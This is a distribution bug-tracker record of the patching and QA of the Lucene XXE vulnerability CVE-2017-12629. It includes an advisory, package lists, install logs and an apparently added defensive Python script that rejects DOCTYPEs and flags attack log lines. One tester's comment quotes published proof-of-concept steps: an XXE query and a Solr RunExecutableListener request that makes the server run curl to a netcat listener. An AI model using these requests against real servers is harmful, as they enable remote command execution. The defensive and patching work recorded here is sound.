Bug 21976 - lucene new security issue CVE-2017-12629
Summary: lucene new security issue CVE-2017-12629
Status: RESOLVED FIXED
Alias: None
Product: Mageia
Classification: Unclassified
Component: Security
Version: 6
Hardware: All Linux
Priority: Normal critical
Target Milestone: ---
Assignee: QA Team
QA Contact: Sec team
URL:
Whiteboard: MGA6-32-OK MGA6-64-OK
Keywords: advisory, validated_update
Depends on:
Blocks:
 
Reported: 2017-11-03 18:00 CET by David Walser
Modified: 2017-11-06 09:23 CET
5 users

See Also:
Source RPM: lucene-6.1.0-1.mga7.src.rpm
CVE:
Status comment:



Description David Walser 2017-11-03 18:00:44 CET
Fedora has issued an advisory on October 31:
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/4VSRNALKTFGMXF7R2WI7KXI3NSLHT7FM/

Mageia 6 is also affected.  Mageia 5 is not affected.
David Walser 2017-11-03 18:01:06 CET

CC: (none) => geiger.david68210
Whiteboard: (none) => MGA6TOO

Comment 1 David Walser 2017-11-03 18:11:39 CET
Fedora advisory from November 1 (corresponds to Mageia 6 version):
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/GTE5P6CWLVBPWNLR3RMLZGEFUYCZZR5V/
Comment 2 David GEIGER 2017-11-04 04:30:56 CET
Fixed for Cauldron and mga6!
Comment 3 David Walser 2017-11-04 16:49:05 CET
Advisory:
========================

Updated lucene packages fix security vulnerability:

It was found that the CoreParser class in Lucene accepts doctype declaration
and expands external entities. An attacker could use this flaw to bypass
security restrictions and access sensitive data (CVE-2017-12629).

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12629
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/GTE5P6CWLVBPWNLR3RMLZGEFUYCZZR5V/
========================

Updated packages in core/updates_testing:
========================
lucene-5.5.0-4.1.mga6
lucene-parent-5.5.0-4.1.mga6
lucene-solr-grandparent-5.5.0-4.1.mga6
lucene-backward-codecs-5.5.0-4.1.mga6
lucene-benchmark-5.5.0-4.1.mga6
lucene-replicator-5.5.0-4.1.mga6
lucene-grouping-5.5.0-4.1.mga6
lucene-highlighter-5.5.0-4.1.mga6
lucene-misc-5.5.0-4.1.mga6
lucene-test-framework-5.5.0-4.1.mga6
lucene-memory-5.5.0-4.1.mga6
lucene-expressions-5.5.0-4.1.mga6
lucene-demo-5.5.0-4.1.mga6
lucene-classification-5.5.0-4.1.mga6
lucene-join-5.5.0-4.1.mga6
lucene-suggest-5.5.0-4.1.mga6
lucene-facet-5.5.0-4.1.mga6
lucene-analysis-5.5.0-4.1.mga6
lucene-sandbox-5.5.0-4.1.mga6
lucene-queries-5.5.0-4.1.mga6
lucene-spatial-5.5.0-4.1.mga6
lucene-spatial3d-5.5.0-4.1.mga6
lucene-codecs-5.5.0-4.1.mga6
lucene-queryparser-5.5.0-4.1.mga6
lucene-analyzers-smartcn-5.5.0-4.1.mga6
lucene-analyzers-phonetic-5.5.0-4.1.mga6
lucene-analyzers-icu-5.5.0-4.1.mga6
lucene-analyzers-morfologik-5.5.0-4.1.mga6
lucene-analyzers-uima-5.5.0-4.1.mga6
lucene-analyzers-kuromoji-5.5.0-4.1.mga6
lucene-analyzers-stempel-5.5.0-4.1.mga6
lucene-javadoc-5.5.0-4.1.mga6

from lucene-5.5.0-4.1.mga6.src.rpm

CC: (none) => mageia
Assignee: mageia => qa-bugs
Version: Cauldron => 6
Whiteboard: MGA6TOO => (none)
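
The advisory above describes an XML External Entity (XXE) flaw: a parser that accepts a DOCTYPE declaration will also honour the entity declarations it carries, including external ones. The script below is an added example written for this page, not Lucene's or Mageia's code, showing the defensive pattern the fix embodies (refuse any DOCTYPE in untrusted XML before it is processed) together with a small check that flags Solr-style request log lines carrying such a query. The helper names, the `parse_untrusted_xml`/`flag_doctype_queries` functions and the sample log lines are constructed for illustration and are not taken from Lucene's CoreParser API or from any real server.

```python
"""Added example (not Lucene's or Mageia's code): refuse DOCTYPE declarations
in untrusted XML, which is the class of flaw described in CVE-2017-12629,
and flag Solr-style request log lines that carry such a query."""
import re
import xml.parsers.expat
from urllib.parse import unquote_plus


class DoctypeRejected(ValueError):
    """Raised when untrusted XML carries a <!DOCTYPE ...> declaration."""


def parse_untrusted_xml(text: str) -> list:
    """Parse XML from an untrusted source and return element names in order.

    Any DOCTYPE is rejected before its internal subset or external DTD is
    looked at, so no entity (internal or external) can ever be declared.
    Hypothetical helper, not the Lucene CoreParser API.
    """
    names = []
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # An exception raised inside a handler aborts parsing and propagates
        # out of parser.Parse(), so nothing after the DOCTYPE is processed.
        raise DoctypeRejected(
            f"DOCTYPE {name!r} (SYSTEM={system_id!r}) not allowed in untrusted input"
        )

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(text, True)
    return names


def is_rejected(text: str) -> bool:
    """True if parse_untrusted_xml refuses the document because of a DOCTYPE."""
    try:
        parse_untrusted_xml(text)
    except DoctypeRejected:
        return True
    return False


# Constructed sample lines in the style of Solr's request log; the second
# one carries the DOCTYPE query shape quoted in the advisory, URL-encoded as
# Solr logs it (sample data, not a capture from any real server).
SAMPLE_SOLR_LOG = [
    "INFO  o.a.s.c.S.Request [gettingstarted]  webapp=/solr path=/select "
    "params={q=*:*&rows=10} status=0 QTime=1",
    "INFO  o.a.s.c.S.Request [gettingstarted]  webapp=/solr path=/select "
    "params={q={!xmlparser+v%3D%27%3C!DOCTYPE+a+SYSTEM+%22http://localhost:4444/"
    "executed%22%3E%3Ca%3E%3C/a%3E%27}} status=0 QTime=3",
    "INFO  o.a.s.c.S.Request [gettingstarted]  webapp=/solr path=/select "
    "params={q={!xmlparser+v%3D%27%3Ca%3E%3C/a%3E%27}} status=0 QTime=2",
]

PARAMS_RE = re.compile(r"params=\{(.*)\}\s+status=")
DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.IGNORECASE)


def flag_doctype_queries(lines):
    """Return the indices of log lines whose decoded query parameters contain
    a DOCTYPE declaration (the tell-tale of an XXE attempt via xmlparser)."""
    hits = []
    for index, line in enumerate(lines):
        match = PARAMS_RE.search(line)
        if not match:
            continue
        # Solr logs parameters URL-encoded; decode before matching so that
        # %3C!DOCTYPE and a literal <!DOCTYPE are both caught.
        if DOCTYPE_RE.search(unquote_plus(match.group(1))):
            hits.append(index)
    return hits


if __name__ == "__main__":
    print(parse_untrusted_xml("<a><b/></a>"))  # ['a', 'b']
    print(is_rejected('<!DOCTYPE a SYSTEM "http://localhost:4444/executed"><a></a>'))  # True
    print(flag_doctype_queries(SAMPLE_SOLR_LOG))  # [1]
```

Rejecting the DOCTYPE outright, rather than only disabling external entity resolution, is the simpler rule to audit: it also closes internal-entity expansion tricks, and a legitimate search query never needs a DTD. The log check is only a first-pass indicator; on a patched server such requests fail harmlessly, but seeing them is still worth an alert.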

Lewis Smith 2017-11-05 13:29:45 CET

Keywords: (none) => advisory
CC: (none) => lewyssmith

Lewis Smith 2017-11-05 13:29:59 CET

CC: lewyssmith => (none)

Comment 4 Len Lawrence 2017-11-05 17:22:15 CET
Mageia 6 on x86_64
Before updating, all the lucene packages were installed, over 200 of them.

Read this first:
http://www.lucenetutorial.com/basic-concepts.html
Lucene In Five Minutes provides a 'Hello World' type application
The first hurdle was to find javac.
Install java-1.8.0-openjdk-devel.
The second hurdle is insurmountable - note that the tutorial says the program is complete:
$ javac HelloLucene.java 
HelloLucene.java:1: error: package org.apache.lucene.analysis.standard does not exist
import org.apache.lucene.analysis.standard.StandardAnalyzer;

and a whole load of similar errors.
So there must be another element of lucene missing.

Reproducing the issues is a complex business involving cut and paste.
A way to demonstrate the vulnerabilities has been posted by
Michael Stepankin & Olga Barinova
https://www.exploit-db.com/exploits/43009/
a:
1) Set up a listener on any port by using netcat command "nc -lv 4444"
2) Open http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:4444/executed"><a></a>'}
b:
1) Create a new collection
   http://localhost:8983/solr/admin/collections?action=CREATE&name=newcollection&numShards=2
2) Set up a listener on any port by using netcat command "nc -lv 4444"
3) Add a new RunExecutableListener listener for the collection where the "exe" attribute contains the name of the command to run ("/usr/bin/curl") and the "args" attribute contains the value "http://localhost:39601/executed" to make a request to the attacker's netcat listener:

POST /solr/newcollection/config HTTP/1.1
Host: localhost:8983
Connection: close
Content-Type: application/json  
Content-Length: 198
 
{
  "add-listener" : {
    "event":"postCommit",
    "name":"newlistener",
    "class":"solr.RunExecutableListener",
    "exe":"curl",
    "dir":"/usr/bin/",
    "args":["http://localhost:4444/executed"]
  }
}
4) Update "newcollection" to trigger execution of RunExecutableListener:
POST /solr/newcollection/update HTTP/1.1
Host: localhost:8983
Connection: close
Content-Type: application/json  
Content-Length: 19
 
[{"id":"test"}]
5) You will see a request from the Solr server on your netcat listener. It proves that the curl command is executed on the server.

They also describe how the vulnerabilities can be chained to provide remote code execution....

Install netcat-traditional for the nc command if it cannot be found.
Opened port 4444 as /tcp and /udp.
$ nc -lv 4444
4444: inverse host lookup failed: Unknown host
listening on [any] 39601 ...
Cut and pasted the http command into firefox:
http://localhost:8983/solr/admin/collections?action=CREATE&name=newcollection&numShards=2
 Unable to connect
  Firefox can't establish a connection to the server at localhost:8983

Going to pass this one on to somebody/anybody with more experience of both java and web applications.

Meanwhile I can verify that the updates installed cleanly; 32 specific components.

CC: (none) => tarazed25

Comment 5 William Kenney 2017-11-05 22:43:43 CET
In VirtualBox, M6, Plasma, 64-bit

Package(s) under test:
lucene lucene-parent lucene-backward-codecs
lucene-benchmark lucene-replicator lucene-grouping

default install of lucene lucene-parent lucene-backward-codecs &
lucene-benchmark lucene-replicator lucene-grouping

185 packages installed

[root@localhost wilcal]# urpmi lucene
Package lucene-5.5.0-4.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-parent
Package lucene-parent-5.5.0-4.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-backward-codecs
Package lucene-backward-codecs-5.5.0-4.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-benchmark
Package lucene-benchmark-5.5.0-4.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-replicator
Package lucene-replicator-5.5.0-4.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-grouping
Package lucene-grouping-5.5.0-4.mga6.noarch is already installed

185 packages installed without error

install lucene lucene-parent lucene-backward-codecs lucene-benchmark
lucene-replicator lucene-grouping from updates_testing

[root@localhost wilcal]# urpmi lucene
Package lucene-5.5.0-4.1.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-parent
Package lucene-parent-5.5.0-4.1.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-backward-codecs
Package lucene-backward-codecs-5.5.0-4.1.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-benchmark
Package lucene-benchmark-5.5.0-4.1.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-replicator
Package lucene-replicator-5.5.0-4.1.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-grouping
Package lucene-grouping-5.5.0-4.1.mga6.noarch is already installed

All packages installed without error

CC: (none) => wilcal.int

Comment 6 William Kenney 2017-11-05 23:06:05 CET
In VirtualBox, M6, Plasma, 32-bit

Package(s) under test:
lucene lucene-parent lucene-backward-codecs
lucene-benchmark lucene-replicator lucene-grouping

default install of lucene lucene-parent lucene-backward-codecs &
lucene-benchmark lucene-replicator lucene-grouping

185 packages installed

[root@localhost wilcal]# urpmi lucene
Package lucene-5.5.0-4.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-parent
Package lucene-parent-5.5.0-4.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-backward-codecs
Package lucene-backward-codecs-5.5.0-4.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-benchmark
Package lucene-benchmark-5.5.0-4.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-replicator
Package lucene-replicator-5.5.0-4.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-grouping
Package lucene-grouping-5.5.0-4.mga6.noarch is already installed

185 packages installed without error

install lucene lucene-parent lucene-backward-codecs lucene-benchmark
lucene-replicator lucene-grouping from updates_testing

[root@localhost wilcal]# urpmi lucene
Package lucene-5.5.0-4.1.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-parent
Package lucene-parent-5.5.0-4.1.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-backward-codecs
Package lucene-backward-codecs-5.5.0-4.1.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-benchmark
Package lucene-benchmark-5.5.0-4.1.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-replicator
Package lucene-replicator-5.5.0-4.1.mga6.noarch is already installed
[root@localhost wilcal]# urpmi lucene-grouping
Package lucene-grouping-5.5.0-4.1.mga6.noarch is already installed

All packages installed without error
Comment 7 William Kenney 2017-11-05 23:07:09 CET
I don't know how much more you can do with this other than starting
a career understanding it.
Comment 8 David Walser 2017-11-05 23:19:20 CET
William is right.  Let's move this along.
Comment 9 William Kenney 2017-11-05 23:37:42 CET
This update works fine.
Testing complete for MGA6, 32-bit & 64-bit
Validating the update.
Could someone from the sysadmin team push to updates.
Thanks

Whiteboard: (none) => MGA6-32-OK MGA6-64-OK

William Kenney 2017-11-05 23:38:31 CET

Keywords: (none) => validated_update
CC: (none) => sysadmin-bugs

Comment 10 Mageia Robot 2017-11-06 09:23:38 CET
An update for this issue has been pushed to the Mageia Updates repository.

https://advisories.mageia.org/MGASA-2017-0403.html

Status: NEW => RESOLVED
Resolution: (none) => FIXED

